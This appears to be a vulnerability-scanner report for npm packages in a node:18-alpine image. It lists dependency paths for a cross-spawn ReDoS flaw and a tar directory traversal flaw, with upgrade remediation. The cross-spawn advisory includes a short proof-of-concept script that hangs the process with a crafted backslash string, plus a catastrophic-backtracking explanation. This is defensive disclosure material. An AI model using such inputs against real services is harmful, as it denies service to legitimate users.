  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + foreground-child@3.2.1 + + cross-spawn@7.0.3 + + + +
    • +
+ +
+ +
+ +

Overview

+

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.

+

PoC

+ 
const { argument } = require('cross-spawn/lib/util/escape');
+        var str = "";
+        for (var i = 0; i < 1000000; i++) {
+          str += "\\";
+        }
+        str += "◎";
+        
+        console.log("start")
+        argument(str)
+        console.log("end")
+        
+        // run `npm install cross-spawn` and `node attack.js` 
+        // then the program will stuck forever with high CPU usage
+
+

Details

+

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

+

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

+

Let’s take the following regular expression as an example:

+ 
regex = /A(B|C+)+D/
+
+

This regular expression accomplishes the following:

+
    +
  • A The string must start with the letter 'A'
    • +
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
    • +
  • D Finally, we ensure this section of the string ends with a 'D'
    • +
+

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

+

It most cases, it doesn't take very long for a regex engine to find a match:

+ 
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
+        0.04s user 0.01s system 95% cpu 0.052 total
+        
+        $ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
+        1.79s user 0.02s system 99% cpu 1.812 total
+
+

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

+

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

+

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

+
    +
  1. CCC
    2. +
  2. CC+C
    3. +
  3. C+CC
    4. +
  4. C+C+C.
    5. +
+

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

+

From there, the number of steps the engine must use to validate a string just continues to grow.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + +
StringNumber of C'sNumber of steps
ACCCX338
ACCCCX471
ACCCCCX5136
ACCCCCCCCCCCCCCX1465,553
+

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

+

Remediation

+

Upgrade cross-spawn to version 6.0.6, 7.0.5 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+

Directory Traversal

+
+ +
+
+ medium severity +
+
+ Exploit: Proof of Concept +
+
+ +
+ +
    +
  • + Manifest file: node:18-alpine /usr/local/lib/node_modules +
    • +
  • + Package Manager: npm +
    • +
  • + Vulnerable module: + + tar +
    • + +
  • Introduced through: + + + lib@*, npm@10.8.2 and others +
    • +
+ +
+ + +

Detailed paths

+ +
    +
  • + Introduced through: + lib@* + + npm@10.8.2 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmaccess@8.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmhook@10.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmorg@6.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmsearch@7.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmteam@6.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-profile@10.0.0 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + tar@6.2.1 + + + +
    • +
